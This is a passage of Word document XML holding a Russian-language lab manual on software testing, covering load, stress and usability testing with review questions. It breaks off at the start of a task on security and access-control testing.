    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оценка производительности и работоспособности приложения на этапе разработки и передачи в эксплуатацию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оценка производительности и работоспособности приложения на этапе выпуска новых релизов, патч-сетов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Оптимизация производительности приложения, включая настройки серверов и оптимизацию кода</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подбор соответствующей для данного приложения аппаратной (программной платформы) и конфигурации сервера</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заметим, что в рамках одной цели могут использоваться разные виды тестов производительности и нагрузки, например, для первой, второй и третьей цели нужно производить как тестирование производительности так и тестирование стабильности. Но при планировании нагрузочного тестирования логичнее все же отталкиваться от технических целей (а не коммерческих, перечисленных выше), которые достигаются в результате тестирования и классифицировать тесты по ним:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если интересует исследование производительности приложения, а именно времена отклика для операций на разных нагрузках в довольно широких диапазонах, включая стрессовые нагрузки то это все таки тестирование производительности (Performance Testing)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если целью является понимание насколько приложение устойчиво в режиме длительного использования (исключение утечек памяти, некорректных конфигурационных настроек и т.д.) то проводится долгий нагрузочный тест - это тестирование стабильности (Stability Testing). При этом анализ времен отклика может иметь место, но не быть первым приоритетом, главное чтобы система "не упала".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Стресс тестирование (Stress Testing) имеет своей целью проверить возвращается ли система после запредельной нагрузки (и как скоро) к нормальному режиму, также целями стрессового тестирования могут быть проверки поведения системы в случаях когда, один из серверов приложения в пуле переста</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>т работать, аварийно изменилась аппаратная конфигурации сервера базы данных и т.д. Отметим также, что при стрессовом тестировании проверяется не производительность системы, а е</w:t>
      </w:r>
      <w:r w:rsidR="00776B59" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> способность к регенерации после сверх нагрузки .</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Главное все-таки в том, чтобы понимать цели того или иного тестирования и постараться их достигнуть.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Этапы проведения нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Рассматривая этапы проведения нагрузочного тестирования имеются обязательные обязательные:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ требований и сбор информации о тестируемой системе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Конфигурация тестового стенда для нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Разработка модели нагрузки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Выбор инструмента для нагрузочного тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Создание и отладка тестовых скриптов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проведение тестирования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Анализ результатов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Подготовка, отправка и публикация отчета по проведенному нагрузочному тестированию</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. Что такое нагрузочное тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>5. Какие цели преследует нагрузочное тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>6. Что такое автоматическое тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 4. Тестирование удобства установки (настройки, инсталляции) программного обеспечения отраслевой направленности.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования или Usability Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Иногда мы сталкиваемся с непонятными, нелогичными приложениями, многие функции и способы использования которых часто не очевидны. После такой работы редко </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>возникает желание использовать приложение снова, и мы ищем более удобные аналоги. Для того чтобы приложение было популярным, ему мало быть функциональным – оно должно быть еще и удобным. Если задуматься, интуитивно понятные приложения экономят нервы пользователям и затраты работодателя на обучение. А значит они более конкурентоспособные! Поэтому тестирование удобства использования, о котором пойдет речь далее является неотъемлемой частью тестирования любых массовых продуктов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования - это метод тестирования, направленный на установление степени удобства использования, обучаемости, понятности и привлекательности для пользователей разрабатываемого продукта в контексте заданных условий. [ISO 9126]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования дает оценку уровня удобства использования приложения по следующим пунктам:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>производительность, эффективность (efficiency) - сколько времени и шагов понадобится пользователю для завершения основных задач приложения, например, размещение новости, регистрации, покупка и т.д.? (меньше - лучше)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>правильность (accuracy) - сколько ошибок сделал пользователь во время работы с приложением? (меньше - лучше)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>активизация в памяти (recall) – как много пользователь помнит о работе приложения после приостановки работы с ним на длительный период времени? (повторное выполнение операций после перерыва должно проходить быстрее чем у нового пользователя)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>эмоциональная реакция (emotional response) – как пользователь себя чувствует после завершения задачи - растерян, испытал стресс? Порекомендует ли пользователь систему своим друзьям? (положительная реакция - лучше)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Уровни проведения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Проверка удобства использования может проводиться как по отношению к готовому продукту, посредством тестирования черного ящика (black box testing), так и к интерфейсам приложения (API), используемым при разработке - тестирование белого ящика (white box testing). В этом случае проверяется удобство использования внутренних объектов, классов, методов и переменных, а также рассматривается удобство изменения, расширения системы и интеграции ее с другими модулями или системами. Использование удобных интерфейсов (API) может улучшить качество, увеличить скорость написания и поддержки разрабатываемого кода, и как следствие улучшить качество продукта в целом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Отсюда очевидно, что тестирование удобства пользования может производиться на разных уровнях разработки программного обеспечения: модульном, интеграционном, системном и приемочном. При этом оно целиком и полностью будет зависит от того, кто будет использовать приложение на выделенном конкретном уровне - разработчик, бизнес пользователь системы и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Советы по улучшению удобства пользования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для дизайна удобных приложений полезно следовать принципам «пока-йока» или fail-safe. У нас это более известно как «защита от дурака». Простой пример, если поле требует цифровое значение, логично ограничить пользователю диапазон ввода только цифрами – будет меньше случайных ошибок.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Для повышения юзабилити существующих приложений можно использовать цикл Демминга Plan-Do-Check-Act, собирая отзывы о работе и дизайне приложения у существующих пользователей, и, в соответствии с их замечаниями, планируя и проводя улучшения.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Заблуждения о тестировании удобства пользования</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Тестирование пользовательского интерфейса = Тестирование удобства пользования. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование удобства пользования не имеет ничего общего с тестированием функциональности пользовательского интерфейса, оно лишь проводится на пользовательском интерфейсе равно как и на многих других возможных компонентах продукта. При этом тип тестирования и тесткейсы будут совсем другие, так как речь может идти об удобстве использования не визуальных компонентов (если таковые имеются) или процессе администрирования, например, распределенного клиент-серверного продукта и т.д.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2. Тестирование удобства пользования можно провести без участия эксперта. Не всегда человек не разбирающийся в предметной области способен провести его самостоятельно. Представьте, что тестировщику нужно протестировать удобство пользования стратегического бомбардировщика. Ему придется проверить основные функции: удобство ведения боя, навигации, пилотирования, обслуживания, наземной транспортировки и т.д. Очевидно, что без привлечения эксперта это будет весьма проблематично, и можно даже сказать, что невозможно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Перечень контрольных вопросов:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. Что такое юзабилити-тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Какие цели юзабилити-тестирование?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3. В чем состоит роль эксперта при таком тестировании?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Задание 5. Тестирование защиты программного обеспечения отраслевой направленности (от несанкционированного доступа).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Краткое теоретическое обоснование:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование безопасности или Security and Access Control Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Тестирование безопасности - это стратегия тестирования, используемая для проверки безопасности системы, а также для анализа рисков, связанных с обеспечением целостного подхода к защите приложения, атак хакеров, вирусов, несанкционированного доступа к конфиденциальным данным.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Принципы безопасности программного обеспечения</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Общая стратегия безопасности основывается на трех основных принципах:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009256B4" w:rsidRPr="00617AC0" w:rsidRDefault="009256B4" w:rsidP="009256B4">
